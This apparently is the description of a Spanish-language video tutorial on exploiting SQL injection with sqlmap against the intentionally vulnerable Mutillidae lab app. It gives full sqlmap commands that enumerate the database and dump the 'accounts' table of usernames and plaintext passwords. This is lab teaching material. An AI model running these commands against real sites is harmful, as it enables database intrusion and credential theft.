Explotar SQL Injection con Sqlmap - Kali Linux

Опубликовано: 21 Март 2026
на канале: Cyber Akuma
909
4

Explotar SQL injection con sqlmap

Usamos el sistema OWASP Broken Web Apps

Usaremos el sitio web
http://192.168.1.109/mutillidae/

Vamos a
OWASP 2013 - A1-Injection(SQL) - SQLi-Extract Data - User Info (SQL)
Ponemos cualquier valor en Name y password
damos clic en View Account Details
Lo que nos interesa es la url

abrimos una terminal y escribimos

sqlmap -u "http://192.168.1.109/mutillidae/index.php?page=user-info.php&username=qwe&password=qwe&user-info-php-submit-button=View+Account+Details" -p username --current-user --current-db

-p nos inica que solo vamos auditar el parametro username
--current-user nos indica que nos muestre el usuario actual
--current-db nos indica que nos muestra la base de datos actual

sqlmap -u "http://192.168.1.109/mutillidae/index.php?page=user-info.php&username=qwe&password=qwe&user-info-php-submit-button=View+Account+Details" -p username -D nowasp --tables
Ahora le pediremos que nos muestre las tablas de la base de datos nowasp

sqlmap -u "http://192.168.1.109/mutillidae/index.php?page=user-info.php&username=qwe&password=qwe&user-info-php-submit-button=View+Account+Details" -p username -D nowasp -T accounts --dump
ahora le pedimos que nos haga un dump de la tabla accounts

Podemos ver que se guardan los usuarios y password en texto plano

Happy Hacking